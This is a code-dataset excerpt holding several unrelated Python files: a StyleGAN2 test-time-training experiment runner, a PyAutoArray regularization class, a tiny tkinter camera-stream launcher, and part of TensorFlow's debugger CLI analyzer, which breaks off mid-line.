args.method == 'TNet':\n e.train_intranetwork_ttt()\n elif args.method == 'TTTz':\n e.train_prenetwork_ttt()\n elif args.method == 'TTTw':\n e.train_prenetwork_w_ttt()\n print('finished train')\n \n for i in range(args.n_eval_samples):\n ##comparison methods\n #if args.method in comparison_methods: #= ['normal','coachz','coachw','ttz','ttw']\n if args.method == 'normal':\n e.sample_n_stylegan_images_without_tt()\n if args.method == 'coachz':\n e.sample_n_stylegan_images_with_coachgan()\n if args.method == 'coachw':\n e.sample_n_stylegan_images_with_w_coachgan()\n if args.method == 'ttz':\n e.sample_n_stylegan_images_with_z_tt()\n if args.method == 'ttw':\n e.sample_n_stylegan_images_with_w_ttl()\n\n ## TTT and TNET \n if args.method == 'TTTz':\n e.sample_n_stylegan_images_with_prenetwork_ttt()\n if args.method == 'TTTw':\n e.sample_n_stylegan_images_with_post_w_prenetwork_ttt()\n if args.method == 'TNet':\n e.sample_n_stylegan_images_with_intranetwork_ttt()\n if args.method == 'TNet+TTT':\n e.sample_n_stylegan_images_with_pre_and_intranetwork_ttt()\n\n e.save_results(num=i*args.batch_size)\n #e.calc_metrics()\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--TT', action='store_true', help='use TT for z')\n#parser.add_argument('--TTl', action='store_true', help='use TT-lerp for w')\n#parser.add_argument('--TTT', action='store_true', help='use TTT for z')\n#parser.add_argument('--w_TTT', action='store_true', help='use TTT for w')\n#parser.add_argument('--coach_z', action='store_true', help='use CoachGAN for z')\n#parser.add_argument('--coach_w', action='store_true', help='use CoachGAN for w')\nfrom os.path import join\nimport easydict\nargs = easydict.EasyDict()\n\nargs.repo = './stylegan2'\nsys.path.append(args.repo)\n\nimport dnnlib\nfrom dnnlib import tflib\n\ntflib.init_tf()\n\nimport metrics\n\n#comparison methods\nargs.truncation = 0.7\nargs.lr =0.00001\nargs.niter = 1000\nargs.batch_size = 2\nargs.n_eval_samples = 5000\ndatasets = ['ffhq','cat','horse','church','car']\nargs.dataset = 'church'\nargs.path ='/content/results'\n\nargs.base_exp_name='testing1000_iter_lr_00001'\nargs.size = 1024 if args.dataset == 'ffhq' else 256\nargs.checkpoint = 'stylegan2-%s-config-f.pt' % args.dataset\nargs.channel_multiplier = 2\nargs.latent = 512\nargs.n_mlp = 8\nargs.device = 'cuda'\n\n## TESTING\nmethods = ['TTTz','TTTw','TNet','TNet+TTT']\n#TTTw isn't working right now\n#methods = ['TTTw','TNet','TNet+TTT']\n#methods = ['TNet','TNet+TTT']\n#methods = ['TNet+TTT']\narchitectures = ['prelu','a','b','c','d','e','f']\n#architectures = ['c','d','e','f']\n#architectures = ['d','e','f']\nlayers = [2,4]#,8]#,16]#,32,64,128,256]\nfor m in methods:\n if m in ['TTTz','TTTw']:\n layers = [2,4,8,16,32]\n else:\n layers = [2,4]\n for arch in architectures:\n for nl in layers:\n args.nlayer = nl\n args.arch = arch\n args.method = m\n\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n ##\n args.arch = arch\n if args.method in ['TTTz','TTTw','TNet','TNet+TTT']:\n args.savedir = join( args.path, args.base_exp_name, args.method+args.arch+str(args.nlayer))\n else:\n args.savedir = join( args.path, args.base_exp_name, args.method)\n print(args.savedir)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n#NOTE: All comparison methods work\n# coachz and ttz give different lookin images (as expected)\ncomparison_methods = ['normal','coachz','coachw','ttz','ttw']\nfor method in comparison_methods:\n print('method:',method)\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\n np.random.seed(seed) # Numpy module.\n random.seed(seed) # Python random module.\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n args.method = method\n args.savedir = join( args.path, args.base_exp_name, args.method)\n if not os.path.exists(args.savedir):\n os.makedirs(args.savedir)\n run(args)\n\n\nexit()\n\n## SAMPLE\n#a\\item BPF + x\n#b\\item BPF-BF + x\n#c\\item BPF-BPF$_{bottleneck}$-BF + \n#d\\item FBP + x\n#e\\item FBP-FB + x\n#f\\item FBP-F_${bottleneck}$BP-FB + \n#our methods\n#if args.train ==> train then sample\n","repo_name":"mbbrodie/stylegan2","sub_path":"run_stylegan_ttt_experiments.py","file_name":"run_stylegan_ttt_experiments.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11703719704","text":"from __future__ import annotations\r\nimport numpy as np\r\nfrom typing import TYPE_CHECKING\r\n\r\nif TYPE_CHECKING:\r\n from autoarray.inversion.linear_obj.linear_obj import LinearObj\r\n\r\nfrom autoarray.inversion.regularization.abstract import AbstractRegularization\r\n\r\nfrom autoarray.inversion.regularization import regularization_util\r\n\r\n\r\nclass BrightnessZeroth(AbstractRegularization):\r\n def __init__(\r\n self,\r\n coefficient: float = 1.0,\r\n signal_scale: float = 1.0,\r\n ):\r\n \"\"\"\r\n An adaptive regularization scheme which applies zeroth order regularization to pixels with low expected\r\n signal values.\r\n\r\n For the weighted regularization scheme, each pixel is given an 'effective regularization weight', which is\r\n controls the degree of zeroth order regularization applied to each pixel. The motivation of this is that\r\n the exterior regions different regions of a pixelization's mesh ought to have a signal consistent with zero,\r\n but may have a low level of non-zero signal when fitting the data.\r\n\r\n To implement this regularization, values on the diagonal of the regularization matrix are increased\r\n according to the regularization weight_list of each pixel.\r\n\r\n Parameters\r\n ----------\r\n coefficient\r\n The regularization coefficient which controls the degree of zeroth order regularizaiton applied to\r\n the inversion reconstruction, in regions of low signal.\r\n signal_scale\r\n A factor which controls how rapidly the smoothness of regularization varies from high signal regions to\r\n low signal regions.\r\n \"\"\"\r\n\r\n super().__init__()\r\n\r\n self.coefficient = coefficient\r\n self.signal_scale = signal_scale\r\n\r\n def regularization_weights_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization weights of the ``BrightnessZeroth`` regularization scheme.\r\n\r\n The weights define the level of zeroth order regularization applied to every mesh parameter (typically pixels\r\n of a ``Mapper``).\r\n\r\n They are computed using an estimate of the expected signal in each pixel.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses these weights when performing regularization.\r\n\r\n Returns\r\n -------\r\n The regularization weights.\r\n \"\"\"\r\n pixel_signals = linear_obj.pixel_signals_from(signal_scale=self.signal_scale)\r\n\r\n return regularization_util.brightness_zeroth_regularization_weights_from(\r\n coefficient=self.coefficient, pixel_signals=pixel_signals\r\n )\r\n\r\n def regularization_matrix_from(self, linear_obj: LinearObj) -> np.ndarray:\r\n \"\"\"\r\n Returns the regularization matrix of this regularization scheme.\r\n\r\n Parameters\r\n ----------\r\n linear_obj\r\n The linear object (e.g. a ``Mapper``) which uses this matrix to perform regularization.\r\n\r\n Returns\r\n -------\r\n The regularization matrix.\r\n \"\"\"\r\n regularization_weights = self.regularization_weights_from(linear_obj=linear_obj)\r\n\r\n return regularization_util.brightness_zeroth_regularization_matrix_from(\r\n regularization_weights=regularization_weights\r\n )\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/inversion/regularization/brightness_zeroth.py","file_name":"brightness_zeroth.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"42212628905","text":"from tkinter import *\nimport webbrowser\n\nroot = Tk()\n\nnew = 1\nurl = \"http://192.168.156.87:8080/\" #Replace with the ip of stream\n\ndef openweb():\n webbrowser.open(url,new=new)\n\nBtn = Button(root, text = \"Stream Cam\",command=openweb)\nBtn.pack()\n\nroot.mainloop()\n","repo_name":"Pritesh-0/rudra_training","sub_path":"guistream.py","file_name":"guistream.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4001291954","text":"import argparse\nimport copy\nimport re\n\n\nfrom tensorflow.python.debug.cli import cli_config\nfrom tensorflow.python.debug.cli import cli_shared\nfrom tensorflow.python.debug.cli import command_parser\nfrom tensorflow.python.debug.cli import debugger_cli_common\nfrom tensorflow.python.debug.cli import evaluator\nfrom tensorflow.python.debug.cli import ui_factory\nfrom tensorflow.python.debug.lib import debug_graphs\nfrom tensorflow.python.debug.lib import source_utils\n\nRL = debugger_cli_common.RichLine\n\n# String constants for the depth-dependent hanging indent at the beginning\n# of each line.\nHANG_UNFINISHED = \"| \" # Used for unfinished recursion depths.\nHANG_FINISHED = \" \"\nHANG_SUFFIX = \"|- \"\n\n# String constant for displaying depth and op type.\nDEPTH_TEMPLATE = \"(%d) \"\nOP_TYPE_TEMPLATE = \"[%s] \"\n\n# String constants for control inputs/outputs, etc.\nCTRL_LABEL = \"(Ctrl) \"\nELLIPSIS = \"...\"\n\nSORT_TENSORS_BY_TIMESTAMP = \"timestamp\"\nSORT_TENSORS_BY_DUMP_SIZE = \"dump_size\"\nSORT_TENSORS_BY_OP_TYPE = \"op_type\"\nSORT_TENSORS_BY_TENSOR_NAME = \"tensor_name\"\n\n\ndef _add_main_menu(output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=True,\n enable_print_tensor=True,\n enable_list_inputs=True,\n enable_list_outputs=True):\n \"\"\"Generate main menu for the screen output from a command.\n\n Args:\n output: (debugger_cli_common.RichTextLines) the output object to modify.\n node_name: (str or None) name of the node involved (if any). If None,\n the menu items node_info, list_inputs and list_outputs will be\n automatically disabled, overriding the values of arguments\n enable_node_info, enable_list_inputs and enable_list_outputs.\n enable_list_tensors: (bool) whether the list_tensor menu item will be\n enabled.\n enable_node_info: (bool) whether the node_info item will be enabled.\n enable_print_tensor: (bool) whether the print_tensor item will be enabled.\n enable_list_inputs: (bool) whether the item list_inputs will be enabled.\n enable_list_outputs: (bool) whether the item list_outputs will be enabled.\n \"\"\"\n\n menu = debugger_cli_common.Menu()\n\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_tensors\", \"list_tensors\", enabled=enable_list_tensors))\n\n if node_name:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\",\n \"node_info -a -d -t %s\" % node_name,\n enabled=enable_node_info))\n menu.append(\n debugger_cli_common.MenuItem(\n \"print_tensor\",\n \"print_tensor %s\" % node_name,\n enabled=enable_print_tensor))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_inputs\",\n \"list_inputs -c -r %s\" % node_name,\n enabled=enable_list_inputs))\n menu.append(\n debugger_cli_common.MenuItem(\n \"list_outputs\",\n \"list_outputs -c -r %s\" % node_name,\n enabled=enable_list_outputs))\n else:\n menu.append(\n debugger_cli_common.MenuItem(\n \"node_info\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"print_tensor\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_inputs\", None, enabled=False))\n menu.append(\n debugger_cli_common.MenuItem(\"list_outputs\", None, enabled=False))\n\n menu.append(\n debugger_cli_common.MenuItem(\"run_info\", \"run_info\"))\n menu.append(\n debugger_cli_common.MenuItem(\"help\", \"help\"))\n\n output.annotations[debugger_cli_common.MAIN_MENU_KEY] = menu\n\n\nclass DebugAnalyzer(object):\n \"\"\"Analyzer for debug data from dump directories.\"\"\"\n\n _TIMESTAMP_COLUMN_HEAD = \"t (ms)\"\n _DUMP_SIZE_COLUMN_HEAD = \"Size (B)\"\n _OP_TYPE_COLUMN_HEAD = \"Op type\"\n _TENSOR_NAME_COLUMN_HEAD = \"Tensor name\"\n\n # Op types to be omitted when generating descriptions of graph structure.\n _GRAPH_STRUCT_OP_TYPE_DENYLIST = (\"_Send\", \"_Recv\", \"_HostSend\", \"_HostRecv\",\n \"_Retval\")\n\n def __init__(self, debug_dump, config):\n \"\"\"DebugAnalyzer constructor.\n\n Args:\n debug_dump: A DebugDumpDir object.\n config: A `cli_config.CLIConfig` object that carries user-facing\n configurations.\n \"\"\"\n\n self._debug_dump = debug_dump\n self._evaluator = evaluator.ExpressionEvaluator(self._debug_dump)\n\n # Initialize tensor filters state.\n self._tensor_filters = {}\n\n self._build_argument_parsers(config)\n config.set_callback(\"graph_recursion_depth\",\n self._build_argument_parsers)\n\n # TODO(cais): Implement list_nodes.\n\n def _build_argument_parsers(self, config):\n \"\"\"Build argument parsers for DebugAnalayzer.\n\n Args:\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n A dict mapping command handler name to `ArgumentParser` instance.\n \"\"\"\n # Argument parsers for command handlers.\n self._arg_parsers = {}\n\n # Parser for list_tensors.\n ap = argparse.ArgumentParser(\n description=\"List dumped intermediate tensors.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-f\",\n \"--tensor_filter\",\n dest=\"tensor_filter\",\n type=str,\n default=\"\",\n help=\"List only Tensors passing the filter of the specified name\")\n ap.add_argument(\n \"-fenn\",\n \"--filter_exclude_node_names\",\n dest=\"filter_exclude_node_names\",\n type=str,\n default=\"\",\n help=\"When applying the tensor filter, exclude node with names \"\n \"matching the regular expression. Applicable only if --tensor_filter \"\n \"or -f is used.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n dest=\"node_name_filter\",\n type=str,\n default=\"\",\n help=\"filter node name by regex.\")\n ap.add_argument(\n \"-t\",\n \"--op_type_filter\",\n dest=\"op_type_filter\",\n type=str,\n default=\"\",\n help=\"filter op type by regex.\")\n ap.add_argument(\n \"-s\",\n \"--sort_by\",\n dest=\"sort_by\",\n type=str,\n default=SORT_TENSORS_BY_TIMESTAMP,\n help=(\"the field to sort the data by: (%s | %s | %s | %s)\" %\n (SORT_TENSORS_BY_TIMESTAMP, SORT_TENSORS_BY_DUMP_SIZE,\n SORT_TENSORS_BY_OP_TYPE, SORT_TENSORS_BY_TENSOR_NAME)))\n ap.add_argument(\n \"-r\",\n \"--reverse\",\n dest=\"reverse\",\n action=\"store_true\",\n help=\"sort the data in reverse (descending) order\")\n self._arg_parsers[\"list_tensors\"] = ap\n\n # Parser for node_info.\n ap = argparse.ArgumentParser(\n description=\"Show information about a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an associated tensor, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-a\",\n \"--attributes\",\n dest=\"attributes\",\n action=\"store_true\",\n help=\"Also list attributes of the node.\")\n ap.add_argument(\n \"-d\",\n \"--dumps\",\n dest=\"dumps\",\n action=\"store_true\",\n help=\"Also list dumps available from the node.\")\n ap.add_argument(\n \"-t\",\n \"--traceback\",\n dest=\"traceback\",\n action=\"store_true\",\n help=\"Also include the traceback of the node's creation \"\n \"(if available in Python).\")\n self._arg_parsers[\"node_info\"] = ap\n\n # Parser for list_inputs.\n ap = argparse.ArgumentParser(\n description=\"Show inputs to a node.\", usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the input tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show inputs to the node recursively, i.e., the input tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of input nodes.\")\n self._arg_parsers[\"list_inputs\"] = ap\n\n # Parser for list_outputs.\n ap = argparse.ArgumentParser(\n description=\"Show the nodes that receive the outputs of given node.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"node_name\",\n type=str,\n help=\"Name of the node or an output tensor from the node, e.g., \"\n \"hidden1/Wx_plus_b/MatMul, hidden1/Wx_plus_b/MatMul:0\")\n ap.add_argument(\n \"-c\", \"--control\", action=\"store_true\", help=\"Include control inputs.\")\n ap.add_argument(\n \"-d\",\n \"--depth\",\n dest=\"depth\",\n type=int,\n default=config.get(\"graph_recursion_depth\"),\n help=\"Maximum depth of recursion used when showing the output tree.\")\n ap.add_argument(\n \"-r\",\n \"--recursive\",\n dest=\"recursive\",\n action=\"store_true\",\n help=\"Show recipients of the node recursively, i.e., the output \"\n \"tree.\")\n ap.add_argument(\n \"-t\",\n \"--op_type\",\n action=\"store_true\",\n help=\"Show op types of recipient nodes.\")\n self._arg_parsers[\"list_outputs\"] = ap\n\n # Parser for print_tensor.\n self._arg_parsers[\"print_tensor\"] = (\n command_parser.get_print_tensor_argparser(\n \"Print the value of a dumped tensor.\"))\n\n # Parser for print_source.\n ap = argparse.ArgumentParser(\n description=\"Print a Python source file with overlaid debug \"\n \"information, including the nodes (ops) or Tensors created at the \"\n \"source lines.\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"source_file_path\",\n type=str,\n help=\"Path to the source file.\")\n ap.add_argument(\n \"-t\",\n \"--tensors\",\n dest=\"tensors\",\n action=\"store_true\",\n help=\"Label lines with dumped Tensors, instead of ops.\")\n ap.add_argument(\n \"-m\",\n \"--max_elements_per_line\",\n type=int,\n default=10,\n help=\"Maximum number of elements (ops or Tensors) to show per source \"\n \"line.\")\n ap.add_argument(\n \"-b\",\n \"--line_begin\",\n type=int,\n default=1,\n help=\"Print source beginning at line number (1-based.)\")\n self._arg_parsers[\"print_source\"] = ap\n\n # Parser for list_source.\n ap = argparse.ArgumentParser(\n description=\"List source files responsible for constructing nodes and \"\n \"tensors present in the run().\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"-p\",\n \"--path_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for file path.\")\n ap.add_argument(\n \"-n\",\n \"--node_name_filter\",\n type=str,\n default=\"\",\n help=\"Regular expression filter for node name.\")\n self._arg_parsers[\"list_source\"] = ap\n\n # Parser for eval.\n ap = argparse.ArgumentParser(\n description=\"\"\"Evaluate an arbitrary expression. Can use tensor values\n from the current debug dump. The debug tensor names should be enclosed\n in pairs of backticks. Expressions with spaces should be enclosed in\n a pair of double quotes or a pair of single quotes. By default, numpy\n is imported as np and can be used in the expressions. E.g.,\n 1) eval np.argmax(`Softmax:0`),\n 2) eval 'np.sum(`Softmax:0`, axis=1)',\n 3) eval \"np.matmul((`output/Identity:0`/`Softmax:0`).T, `Softmax:0`)\".\n \"\"\",\n usage=argparse.SUPPRESS)\n ap.add_argument(\n \"expression\",\n type=str,\n help=\"\"\"Expression to be evaluated.\n 1) in the simplest case, use :, e.g.,\n hidden_0/MatMul:0.\n\n 2) if the default debug op \"DebugIdentity\" is to be overridden, use\n ::, e.g.,\n hidden_0/MatMul:0:DebugNumericSummary.\n\n 3) if the tensor of the same name exists on more than one device, use\n ::[:], e.g.,\n /job:worker/replica:0/task:0/gpu:0:hidden_0/MatMul:0\n /job:worker/replica:0/task:2/cpu:0:hidden_0/MatMul:0:DebugNanCount.\n\n 4) if the tensor is executed multiple times in a given `Session.run`\n call, specify the execution index with a 0-based integer enclose in a\n pair of brackets at the end, e.g.,\n RNN/tanh:0[0]\n /job:worker/replica:0/task:0/gpu:0:RNN/tanh:0[0].\"\"\")\n ap.add_argument(\n \"-a\",\n \"--all\",\n dest=\"print_all\",\n action=\"store_true\",\n help=\"Print the tensor in its entirety, i.e., do not use ellipses \"\n \"(may be slow for large results).\")\n ap.add_argument(\n \"-w\",\n \"--write_path\",\n default=\"\",\n help=\"Path of the numpy file to write the evaluation result to, \"\n \"using numpy.save()\")\n self._arg_parsers[\"eval\"] = ap\n\n def add_tensor_filter(self, filter_name, filter_callable):\n \"\"\"Add a tensor filter.\n\n A tensor filter is a named callable of the signature:\n filter_callable(dump_datum, tensor),\n\n wherein dump_datum is an instance of debug_data.DebugTensorDatum carrying\n metadata about the dumped tensor, including tensor name, timestamps, etc.\n tensor is the value of the dumped tensor as an numpy.ndarray object.\n The return value of the function is a bool.\n This is the same signature as the input argument to\n debug_data.DebugDumpDir.find().\n\n Args:\n filter_name: (str) name of the filter. Cannot be empty.\n filter_callable: (callable) a filter function of the signature described\n as above.\n\n Raises:\n ValueError: If filter_name is an empty str.\n TypeError: If filter_name is not a str.\n Or if filter_callable is not callable.\n \"\"\"\n\n if not isinstance(filter_name, str):\n raise TypeError(\"Input argument filter_name is expected to be str, \"\n \"but is not.\")\n\n # Check that filter_name is not an empty str.\n if not filter_name:\n raise ValueError(\"Input argument filter_name cannot be empty.\")\n\n # Check that filter_callable is callable.\n if not callable(filter_callable):\n raise TypeError(\n \"Input argument filter_callable is expected to be callable, \"\n \"but is not.\")\n\n self._tensor_filters[filter_name] = filter_callable\n\n def get_tensor_filter(self, filter_name):\n \"\"\"Retrieve filter function by name.\n\n Args:\n filter_name: Name of the filter set during add_tensor_filter() call.\n\n Returns:\n The callable associated with the filter name.\n\n Raises:\n ValueError: If there is no tensor filter of the specified filter name.\n \"\"\"\n\n if filter_name not in self._tensor_filters:\n raise ValueError(\"There is no tensor filter named \\\"%s\\\"\" % filter_name)\n\n return self._tensor_filters[filter_name]\n\n def get_help(self, handler_name):\n return self._arg_parsers[handler_name].format_help()\n\n def list_tensors(self, args, screen_info=None):\n \"\"\"Command handler for list_tensors.\n\n List tensors dumped during debugged Session.run() call.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n\n Raises:\n ValueError: If `--filter_exclude_node_names` is used without `-f` or\n `--tensor_filter` being used.\n \"\"\"\n\n # TODO(cais): Add annotations of substrings for dumped tensor names, to\n # facilitate on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"list_tensors\"].parse_args(args)\n\n output = []\n\n filter_strs = []\n if parsed.op_type_filter:\n op_type_regex = re.compile(parsed.op_type_filter)\n filter_strs.append(\"Op type regex filter: \\\"%s\\\"\" % parsed.op_type_filter)\n else:\n op_type_regex = None\n\n if parsed.node_name_filter:\n node_name_regex = re.compile(parsed.node_name_filter)\n filter_strs.append(\"Node name regex filter: \\\"%s\\\"\" %\n parsed.node_name_filter)\n else:\n node_name_regex = None\n\n output = debugger_cli_common.RichTextLines(filter_strs)\n output.append(\"\")\n\n if parsed.tensor_filter:\n try:\n filter_callable = self.get_tensor_filter(parsed.tensor_filter)\n except ValueError:\n output = cli_shared.error(\"There is no tensor filter named \\\"%s\\\".\" %\n parsed.tensor_filter)\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n data_to_show = self._debug_dump.find(\n filter_callable,\n exclude_node_names=parsed.filter_exclude_node_names)\n else:\n if parsed.filter_exclude_node_names:\n raise ValueError(\n \"The flag --filter_exclude_node_names is valid only when \"\n \"the flag -f or --tensor_filter is used.\")\n\n data_to_show = self._debug_dump.dumped_tensor_data\n\n # TODO(cais): Implement filter by lambda on tensor value.\n\n max_timestamp_width, max_dump_size_width, max_op_type_width = (\n self._measure_tensor_list_column_widths(data_to_show))\n\n # Sort the data.\n data_to_show = self._sort_dump_data_by(\n data_to_show, parsed.sort_by, parsed.reverse)\n\n output.extend(\n self._tensor_list_column_heads(parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width))\n\n dump_count = 0\n for dump in data_to_show:\n if node_name_regex and not node_name_regex.match(dump.node_name):\n continue\n\n if op_type_regex:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if not op_type_regex.match(op_type):\n continue\n\n rel_time = (dump.timestamp - self._debug_dump.t0) / 1000.0\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n dumped_tensor_name = \"%s:%d\" % (dump.node_name, dump.output_slot)\n op_type = self._debug_dump.node_op_type(dump.node_name)\n\n line = \"[%.3f]\" % rel_time\n line += \" \" * (max_timestamp_width - len(line))\n line += dump_size_str\n line += \" \" * (max_timestamp_width + max_dump_size_width - len(line))\n line += op_type\n line += \" \" * (max_timestamp_width + max_dump_size_width +\n max_op_type_width - len(line))\n line += dumped_tensor_name\n\n output.append(\n line,\n font_attr_segs=[(\n len(line) - len(dumped_tensor_name), len(line),\n debugger_cli_common.MenuItem(\"\", \"pt %s\" % dumped_tensor_name))])\n dump_count += 1\n\n if parsed.tensor_filter:\n output.prepend([\n \"%d dumped tensor(s) passing filter \\\"%s\\\":\" %\n (dump_count, parsed.tensor_filter)\n ])\n else:\n output.prepend([\"%d dumped tensor(s):\" % dump_count])\n\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n def _measure_tensor_list_column_widths(self, data):\n \"\"\"Determine the maximum widths of the timestamp and op-type column.\n\n This method assumes that data is sorted in the default order, i.e.,\n by ascending timestamps.\n\n Args:\n data: (list of DebugTensorDaum) the data based on which the maximum\n column widths will be determined.\n\n Returns:\n (int) maximum width of the timestamp column. 0 if data is empty.\n (int) maximum width of the dump size column. 0 if data is empty.\n (int) maximum width of the op type column. 0 if data is empty.\n \"\"\"\n\n max_timestamp_width = 0\n if data:\n max_rel_time_ms = (data[-1].timestamp - self._debug_dump.t0) / 1000.0\n max_timestamp_width = len(\"[%.3f] \" % max_rel_time_ms) + 1\n max_timestamp_width = max(max_timestamp_width,\n len(self._TIMESTAMP_COLUMN_HEAD) + 1)\n\n max_dump_size_width = 0\n for dump in data:\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n if len(dump_size_str) + 1 > max_dump_size_width:\n max_dump_size_width = len(dump_size_str) + 1\n max_dump_size_width = max(max_dump_size_width,\n len(self._DUMP_SIZE_COLUMN_HEAD) + 1)\n\n max_op_type_width = 0\n for dump in data:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if len(op_type) + 1 > max_op_type_width:\n max_op_type_width = len(op_type) + 1\n max_op_type_width = max(max_op_type_width,\n len(self._OP_TYPE_COLUMN_HEAD) + 1)\n\n return max_timestamp_width, max_dump_size_width, max_op_type_width\n\n def _sort_dump_data_by(self, data, sort_by, reverse):\n \"\"\"Sort a list of DebugTensorDatum in specified order.\n\n Args:\n data: (list of DebugTensorDatum) the data to be sorted.\n sort_by: The field to sort data by.\n reverse: (bool) Whether to use reversed (descending) order.\n\n Returns:\n (list of DebugTensorDatum) in sorted order.\n\n Raises:\n ValueError: given an invalid value of sort_by.\n \"\"\"\n\n if sort_by == SORT_TENSORS_BY_TIMESTAMP:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: x.timestamp)\n elif sort_by == SORT_TENSORS_BY_DUMP_SIZE:\n return sorted(data, reverse=reverse, key=lambda x: x.dump_size_bytes)\n elif sort_by == SORT_TENSORS_BY_OP_TYPE:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: self._debug_dump.node_op_type(x.node_name))\n elif sort_by == SORT_TENSORS_BY_TENSOR_NAME:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: \"%s:%d\" % (x.node_name, x.output_slot))\n else:\n raise ValueError(\"Unsupported key to sort tensors by: %s\" % sort_by)\n\n def _tensor_list_column_heads(self, parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width):\n \"\"\"Generate a line containing the column heads of the tensor list.\n\n Args:\n parsed: Parsed arguments (by argparse) of the list_tensors command.\n max_timestamp_width: (int) maximum width of the timestamp column.\n max_dump_size_width: (int) maximum width of the dump size column.\n max_op_type_width: (int) maximum width of the op type column.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n base_command = \"list_tensors\"\n if parsed.tensor_filter:\n base_command += \" -f %s\" % parsed.tensor_filter\n if parsed.op_type_filter:\n base_command += \" -t %s\" % parsed.op_type_filter\n if parsed.node_name_filter:\n base_command += \" -n %s\" % parsed.node_name_filter\n\n attr_segs = {0: []}\n row = self._TIMESTAMP_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TIMESTAMP)\n if parsed.sort_by == SORT_TENSORS_BY_TIMESTAMP and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append(\n (0, len(row), [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._DUMP_SIZE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_DUMP_SIZE)\n if parsed.sort_by == SORT_TENSORS_BY_DUMP_SIZE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_dump_size_width + max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._OP_TYPE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_OP_TYPE)\n if parsed.sort_by == SORT_TENSORS_BY_OP_TYPE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n prev_len = len(row)\n row += self._TENSOR_NAME_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TENSOR_NAME)\n if parsed.sort_by == SORT_TENSORS_BY_TENSOR_NAME and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n 